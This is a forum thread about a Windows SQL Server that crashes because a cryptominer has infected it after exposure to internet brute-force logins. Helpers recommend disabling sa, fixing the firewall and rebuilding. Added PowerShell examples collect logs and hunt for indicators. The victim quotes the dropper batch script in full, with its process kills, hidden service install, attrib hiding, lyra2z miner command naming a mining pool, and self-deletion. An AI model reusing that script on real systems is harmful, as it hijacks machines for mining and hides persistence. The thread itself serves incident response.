July 4, 2017 at 8:53 pm
Hello Everyone,
I have a Windows Server 2016 server which is running SQL Server 2016.
My application interacts with the server and exchanges stock market data.
Things have been going well for the last 6 months. However, for the last week to 10 days the SQL Server suddenly stops running. When I look at the event log it shows that SQL Server has crashed. I have to start the server again and then it resumes.
I don't know why this is happening. However, I did notice an application running called secury.exe which consumes a lot of memory. Have a look at the screenshot. My server has over 15 GB of free disk space and 2 GB RAM. However, the applications which exchange data with the server are few at the moment (<30).
I did run a Windows Defender quick scan but it didn't turn up anything.
Please advise as to what I can do.
Regards,
GR
July 5, 2017 at 12:10 am
Can you post the errors from the log please?
😎
July 5, 2017 at 1:54 am
Eirikur Eiriksson - Wednesday, July 5, 2017 12:10 AM
Can you post the errors from the log please?
😎
How do I do that?
To me it appears to be some sort of malware. Check out the name of the folder in the screenshot in the first post. The spelling of Microsoft is incorrect.
July 5, 2017 at 1:57 am
greatchap_99 - Wednesday, July 5, 2017 1:54 AM
How do I do that?
Open the SQL error log, copy the messages from around the time of the crash and post them here. Same with the windows event log.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
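An added example (mine, not Gail's or the thread's) of pulling exactly the two things she asks for: the SQL Server error log entries around the crash time, and the Application event log entries from the same window, plus a per-login, per-client summary of failed logins that can be posted without the rest of the log's configuration detail. It assumes the SqlServer PowerShell module (Invoke-Sqlcmd), a default instance on the host it runs on, and a constructed crash time of 2017-07-04 20:30 that stands in for the real one.

```powershell
# Added example, not from the thread. Assumes: run on the SQL host itself, the
# SqlServer module (Invoke-Sqlcmd) is installed, default instance, and the crash
# time below is a constructed placeholder to be replaced with the real one.
$crashTime = Get-Date '2017-07-04 20:30'
$from = $crashTime.AddMinutes(-30)
$to   = $crashTime.AddMinutes(30)
$fmt  = 'yyyy-MM-dd HH:mm:ss'

# 1. SQL Server error log. xp_readerrorlog takes (log number, 1 = SQL log,
#    search string 1, search string 2, start time, end time, sort order).
#    Log 0 is the one written since the last start; because the service was
#    restarted after the crash, the crash itself is in the previous log, number 1.
$query = "EXEC master.dbo.xp_readerrorlog 1, 1, NULL, NULL, " +
         "'$($from.ToString($fmt))', '$($to.ToString($fmt))', N'asc'"
$sqlLog = Invoke-Sqlcmd -ServerInstance '.' -Query $query
$sqlLog | Select-Object LogDate, ProcessInfo, Text | Format-Table -Wrap

# 2. Windows Application log entries from SQL Server in the same window.
#    Failed logins are logged as error 18456; a crash is usually preceded by
#    stack dump / "SQL Server is terminating" messages.
Get-WinEvent -FilterHashtable @{
    LogName      = 'Application'
    ProviderName = 'MSSQLSERVER'
    StartTime    = $from
    EndTime      = $to
} -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, LevelDisplayName, Message | Format-Table -Wrap

# 3. A safe-to-share summary: which logins are being guessed, and from where.
#    Current log (0) plus the previous one (1).
$failed = foreach ($n in 0, 1) {
    Invoke-Sqlcmd -ServerInstance '.' -Query "EXEC master.dbo.xp_readerrorlog $n, 1, N'Login failed'"
}
$failed | ForEach-Object {
    if ($_.Text -match "Login failed for user '([^']+)'.*\[CLIENT: ([^\]]+)\]") {
        [pscustomobject]@{ Login = $Matches[1]; Client = $Matches[2] }
    }
} | Group-Object Login, Client | Sort-Object Count -Descending |
    Select-Object Count, Name -First 20
```

The summary in step 3 is what answers the question actually being asked in a public thread; the raw log, as Gail notes later, carries listener addresses, ports, database names and service details that should not be posted.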
July 5, 2017 at 3:34 am
Both log files attached. See pdf files.
Thank you.
July 5, 2017 at 3:52 am
Not related to the crash, but...
Disable the sa account and fix that server's firewalls so that it's not exposed to the entire internet. You've got login attempts on sa and other administrator-type accounts from Kenya, China and Thailand at the minimum. Since the server is in India, I doubt they're legit logins.
Database servers should never be exposed to the internet, they're prime targets because of the value of the data.
p.s. remove those attachments. I asked for the messages around the time of the crash, not the full details of your server, the IP addresses and ports that it's listening on, database names, services that Windows is running etc.
Actually, thinking about it, if the security of the rest of the server is as badly screwed up as the firewall, better to trash the server and reinstall it from scratch, and get the configuration right this time.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
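The two fixes Gail asks for, as an added example that is not part of the thread: see who is connected to the listener right now, disable sa and list the remaining sysadmin logins for review, then replace any inbound rule that opens the SQL port to the world with one scoped to the application hosts. It assumes an elevated session on the SQL host, the SqlServer PowerShell module, a default instance on TCP 1433, and a constructed placeholder subnet 192.0.2.0/24 for the application servers.

```powershell
# Added example, not from the thread. Assumes: run elevated on the SQL host,
# SqlServer module present, default instance listening on TCP 1433, and that the
# application hosts live in 192.0.2.0/24 (a constructed placeholder subnet).
$appSubnet = '192.0.2.0/24'

# 1. Who is connected to the listener right now? Any RemoteAddress outside the
#    app subnet is the exposure being described.
Get-NetTCPConnection -LocalPort 1433 -State Established -ErrorAction SilentlyContinue |
    Group-Object RemoteAddress | Sort-Object Count -Descending |
    Select-Object Count, Name

# 2. Disable sa and list every other sysadmin login so each can be reviewed.
Invoke-Sqlcmd -ServerInstance '.' -Query @'
ALTER LOGIN [sa] DISABLE;
SELECT name, type_desc, is_disabled
FROM sys.server_principals
WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;
'@ | Format-Table

# 3. Turn off every enabled inbound rule that covers 1433, add one scoped to
#    the app subnet, and make "block" the default for unsolicited inbound traffic.
Get-NetFirewallPortFilter -Protocol TCP |
    Where-Object { $_.LocalPort -contains '1433' } |
    Get-NetFirewallRule |
    Where-Object { $_.Direction -eq 'Inbound' -and $_.Enabled -eq 'True' } |
    Disable-NetFirewallRule
New-NetFirewallRule -DisplayName 'SQL Server 1433 - app servers only' `
    -Direction Inbound -Protocol TCP -LocalPort 1433 `
    -RemoteAddress $appSubnet -Action Allow -Profile Any | Out-Null
Set-NetFirewallProfile -Profile Domain,Private,Public -DefaultInboundAction Block

# 4. Verify: the only enabled inbound allow rule for 1433 should carry the app subnet.
Get-NetFirewallPortFilter -Protocol TCP |
    Where-Object { $_.LocalPort -contains '1433' } |
    Get-NetFirewallRule |
    Where-Object { $_.Direction -eq 'Inbound' -and $_.Enabled -eq 'True' -and $_.Action -eq 'Allow' } |
    Get-NetFirewallAddressFilter |
    Select-Object RemoteAddress
```

The host firewall is only one layer: if the machine sits behind a hosting provider's or cloud network's own firewall, the same port restriction belongs there too, so that a later mistake on the host does not re-expose the listener.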
July 5, 2017 at 4:27 am
Looks to me like someone is trying to use the old "DTS Password" vulnerability or later variants thereof
😎
Recommend that you remove those attachments immediately!
July 5, 2017 at 4:35 am
Thank you for your feedback. [attachments deleted]
I am not very well versed with the configuration of SQL Server or so. Thus I may not be able to fix the whole issue.
Meanwhile I would like to do 2 things:
1) Disable the sa account
2) Fix malware (I think)
There are 2 dat files in programdata folder: one file reads
taskkill /f /t /im winlog.exe
taskkill /f /t /im kingsoft.exe
taskkill /f /t /im secury.exe
C:\ProgramData\xn.exe e -o+ C:\ProgramData\*.rar C:\ProgramData\Microsof.NET\
del /F /S /Q C:\ProgramData\*.rar C:\ProgramData\xn.exe
c:\ProgramData\Microsof.NET\kingsoft.exe
c:\ProgramData\Microsof.NET\winlogon.exe install Workstationxzc secury.exe -a lyra2z -o stratum+tcp://
c:\ProgramData\Microsof.NET\winlogon.exe start Workstationxzc
@attrib +s +h +r c:\ProgramData\Microsof.NET\winlogon.exe
@attrib +s +h +r c:\ProgramData\Microsof.NET\secury.exe
@attrib +s +h +r c:\ProgramData\Microsof.NET\kingsoft.exe
C:\ProgramData\Microsof.NET\secury.exe -a lyra2z -o stratum+tcp://
del c:\ProgramData\b.bat
del c:\ProgramData\p.bat
del /F /S /Q C:\ProgramData\b.exe C:\ProgramData\ba.exe
del %0
The other reads
c:\ProgramData\Microsof.NET\secury.exe -a lyra2z -o stratum+tcp://us-east.lyra2z-hub.miningpoolhub.com:20581 -u Allin.any -p x
As I mentioned, I ended an application called secury.exe which was running in the background and taking a lot of CPU. I think the above is responsible for SQL Server crashing out.
What do you say? Should I delete the bat files and the folder where this exe resides? (Screenshot attached in the first image shows files/info)
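A read-only triage pass for the indicators in the batch file above, added here as an example and not part of the thread: it looks for live processes carrying miner arguments, services and scheduled tasks whose binaries sit under ProgramData (the script's "winlogon.exe install Workstationxzc ..." line registers exactly such a service), and the hidden+system files the script creates with attrib +s +h +r. It reports and removes nothing, so the evidence is still there when deciding whether to rebuild. It assumes an elevated session on the affected host; the folder and file names come from the posted script.

```powershell
# Added example, not from the thread. Read-only triage for the indicators in the
# batch file above: it reports, and removes nothing. Assumes: run elevated on the
# affected host. Names below are taken from the posted script.
$iocDir   = 'C:\ProgramData\Microsof.NET'        # note the misspelled "Microsof"
$iocNames = 'secury.exe','kingsoft.exe','winlogon.exe','xn.exe','b.bat','p.bat','b.exe','ba.exe'

function Find-MinerIndicators {
    # 1. Live processes: miner arguments on the command line, or a binary under
    #    the dropped folder. The real winlogon.exe lives in C:\Windows\System32;
    #    a copy under ProgramData is a name look-alike.
    Get-CimInstance Win32_Process |
        Where-Object { $_.CommandLine -match 'stratum\+tcp://|lyra2z' -or
                       $_.ExecutablePath -like "$iocDir\*" } |
        ForEach-Object {
            [pscustomobject]@{ Kind = 'Process'; Name = $_.Name
                               Detail = "$($_.ProcessId) $($_.CommandLine)" }
        }

    # 2. Services whose binary lives in ProgramData, a user profile or a temp
    #    folder; legitimate services seldom do.
    Get-CimInstance Win32_Service |
        Where-Object { $_.PathName -match 'ProgramData|\\Users\\|\\Temp\\' } |
        ForEach-Object {
            [pscustomobject]@{ Kind = 'Service'; Name = $_.Name
                               Detail = "$($_.State) $($_.StartMode) $($_.PathName)" }
        }

    # 3. Scheduled tasks pointing at the same places (a common second persistence).
    Get-ScheduledTask | ForEach-Object {
        $t = $_
        $t.Actions | Where-Object { "$($_.Execute) $($_.Arguments)" -match 'ProgramData' } |
            ForEach-Object {
                [pscustomobject]@{ Kind = 'Task'; Name = $t.TaskName
                                   Detail = "$($_.Execute) $($_.Arguments)" }
            }
    }

    # 4. Files: the named droppers anywhere under ProgramData, plus any
    #    hidden+system executable there (the script sets +s +h +r on its binaries).
    #    -Force is required for Get-ChildItem to return hidden files at all.
    Get-ChildItem -Path C:\ProgramData -Recurse -Force -File -ErrorAction SilentlyContinue |
        Where-Object {
            ($_.Name -in $iocNames) -or
            ($_.Extension -in '.exe','.dll','.bat','.cmd' -and
             $_.Attributes.HasFlag([IO.FileAttributes]::Hidden) -and
             $_.Attributes.HasFlag([IO.FileAttributes]::System))
        } |
        ForEach-Object {
            $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            [pscustomobject]@{ Kind = 'File'; Name = $_.FullName
                               Detail = "$($_.LastWriteTime) $($_.Length) bytes sha256=$hash" }
        }
}

Find-MinerIndicators | Format-Table -AutoSize -Wrap
```

Recording the SHA-256 of each file before anything is deleted is what lets a second scanner, or a later question in a thread like this one, be answered with a hash rather than a screenshot. Any hit under step 2 or 3 is the reason deleting the folder alone is unlikely to be enough: the service or task will simply fail to start, or re-fetch its payload, on the next boot.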
July 5, 2017 at 4:49 am
Fix your firewall settings!
GilaMonster - Wednesday, July 5, 2017 3:52 AM
Actually, thinking about it, if the security of the rest of the server is as badly screwed up as the firewall, better to trash the server and reinstall it from scratch, and get the configuration right this time.
And saying you may not get it right is like saying you don't care if the entire database shows up on pastebin, or for sale by hackers. If you don't know network security, find someone who does.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
July 5, 2017 at 8:41 pm
GilaMonster - Wednesday, July 5, 2017 4:49 AM
Fix your firewall settings!
GilaMonster - Wednesday, July 5, 2017 3:52 AM
Actually, thinking about it, if the security of the rest of the server is as badly screwed up as the firewall, better to trash the server and reinstall it from scratch, and get the configuration right this time.
And saying you may not get it right is like saying you don't care if the entire database shows up on pastebin, or for sale by hackers. If you don't know network security, find someone who does.
I will try to configure this server itself and fix the firewall. However, regarding my earlier post, do you suspect malware?
July 6, 2017 at 1:39 am
greatchap_99 - Wednesday, July 5, 2017 8:41 PM
I will try to configure this server itself and fix the firewall. However, regarding my earlier post, do you suspect malware?
It looks suspicious, and the site in the URL posted is a cryptocurrency site, so it might be busy mining bitcoins on your server.
If it's malware, and it's competently written, deleting the folder won't get rid of it. That's kinda why I suggested trashing the server and reinstalling it from scratch correctly.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
July 6, 2017 at 6:00 am
I fixed the firewall and deleted the malware. The server is OK now, and no unwanted incoming connections should come in as the settings have been tweaked. In the DB I also disabled "accept remote connections".
I appreciate your help guys. 🙂
July 6, 2017 at 8:24 am
greatchap_99 - Thursday, July 6, 2017 6:00 AM
I fixed the firewall and deleted the malware. The server is OK now, and no unwanted incoming connections should come in as the settings have been tweaked. In the DB I also disabled "accept remote connections". I appreciate your help guys. 🙂
I would download a second antivirus/anti-malware to test against your system. Clamwin portable is a fairly lightweight and free antivirus that you could run and it shouldn't interfere with the existing one. And I'd run malwarebytes anti-malware (free version) to make sure you got everything.
I would be concerned about these lines in the scripts you posted:
del c:\ProgramData\b.bat
del c:\ProgramData\p.bat
del /F /S /Q C:\ProgramData\b.exe C:\ProgramData\ba.exe
Those to me look like it is cleaning up the installation files, but I wouldn't be surprised if there is more on your system that those installed. Best case - those files were used to get the other files and infect your system initially, and removing the folder cleaned it up. Worst case - you have ransomware, and once it finishes encrypting your disk, everything will be busted.
Do you have any other odd-looking files in C:\programdata?
The above is all just my opinion on what you should do.
As with all advice you find on a random internet forum - you shouldn't blindly follow it. Always test on a test server to see if there are negative side effects before making changes to live!
I recommend you NEVER run "random code" you found online on any system you care about UNLESS you understand and can verify the code OR you don't care if the code trashes your system.
July 7, 2017 at 5:56 am
bmg002 - Thursday, July 6, 2017 8:24 AM
greatchap_99 - Thursday, July 6, 2017 6:00 AM
I fixed the firewall and deleted the malware. The server is OK now, and no unwanted incoming connections should come in as the settings have been tweaked. In the DB I also disabled "accept remote connections". I appreciate your help guys. 🙂
I would download a second antivirus/anti-malware to test against your system. Clamwin portable is a fairly lightweight and free antivirus that you could run and it shouldn't interfere with the existing one. And I'd run malwarebytes anti-malware (free version) to make sure you got everything.
I would be concerned about these lines in the scripts you posted:
del c:\ProgramData\b.bat
del c:\ProgramData\p.bat
del /F /S /Q C:\ProgramData\b.exe C:\ProgramData\ba.exe
Those to me look like it is cleaning up the installation files, but I wouldn't be surprised if there is more on your system that those installed. Best case - those files were used to get the other files and infect your system initially, and removing the folder cleaned it up. Worst case - you have ransomware, and once it finishes encrypting your disk, everything will be busted.
Do you have any other odd-looking files in C:\programdata?
I installed Malwarebytes and ran a scan. The scan did not detect any malware. The bat files and the concerned folder have already been deleted. I inspected the server myself and am not able to find any traces of anything suspicious anymore.
July 7, 2017 at 7:04 am
I wonder if it was malware, or if someone intentionally installed it on the server to make some profit on the side from the cryptocurrency mining.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability